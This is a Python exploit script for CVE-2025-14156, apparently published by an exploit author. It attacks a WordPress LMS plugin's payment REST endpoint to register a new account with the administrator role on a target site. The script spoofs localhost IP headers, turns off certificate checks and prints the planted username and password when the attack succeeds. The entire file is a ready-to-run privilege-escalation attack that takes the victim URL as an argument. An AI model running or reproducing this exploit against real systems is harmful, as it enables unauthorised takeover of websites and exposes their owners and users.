#By: Nxploited
#Github: https://github.com/Nxploited
#Telegram: https://t.me/KNxploited

import sys
import argparse
import json
import requests

def encode_utf8(data):
    if isinstance(data, dict):
        return {str(k): encode_utf8(v) for k, v in data.items()}
    elif isinstance(data, list):
        return [encode_utf8(i) for i in data]
    elif isinstance(data, str):
        return data.encode('utf-8', errors='replace').decode('utf-8')
    else:
        return data

def send_exploit(target_url):
    endpoint = f"{target_url}/wp-json/fox-lms/v1/payments/create-order"
    payload = {
        "first_name": "Attacker",
        "last_name": "User",
        "username": "nxploited",
        "email": "nx@nxploit.site",
        "password": "Nxploited@2025Strong",
        "role": "administrator",
        "courseId": 1
    }
    payload = encode_utf8(payload)
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Nxploit-CCL-Bypass",
        "X-Requested-With": "XMLHttpRequest",
        "X-Forwarded-For": "127.0.0.1",
        "X-Originating-IP": "127.0.0.1",
        "X-Remote-IP": "127.0.0.1",
        "X-Remote-Addr": "127.0.0.1",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.9"
    }
    try:
        response = requests.post(endpoint, headers=headers, data=json.dumps(payload), verify=False, timeout=20, allow_redirects=False)
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {str(e)}")
        return False

    cookies = response.cookies.get_dict()
    if cookies:
        print("[+] Exploit Successful!")
        print(f"Username: {payload['username']}")
        print(f"Password: {payload['password']}")
        return True

    if response.status_code != 200:
        print(f"[!] Exploit failed. HTTP status: {response.status_code}")
        return False

    try:
        res_json = response.json()
    except Exception:
        res_json = None

    if 200 <= response.status_code < 300 and res_json is not None:
        if any(keyword in response.text for keyword in ["administrator", "success", "user", "wordpress_logged_in"]):
            print("[+] Exploit Successful!")
            print(f"Username: {payload['username']}")
            print(f"Password: {payload['password']}")
            return True
        else:
            print("[!] Exploit response received, but did not indicate success.")
    else:
        print("[!] Did not receive expected HTTP response.")
    return False

def main():
    parser = argparse.ArgumentParser(
        description="CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited"
    )
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g. https://victim.site)')
    args = parser.parse_args()

    print("[*] Starting CVE-2025-14156 Exploit ...")
    if not args.url.startswith("http"):
        print("[!] Please provide a valid URL starting with http or https.")
        sys.exit(1)
    send_exploit(args.url)

if __name__ == "__main__":
    main()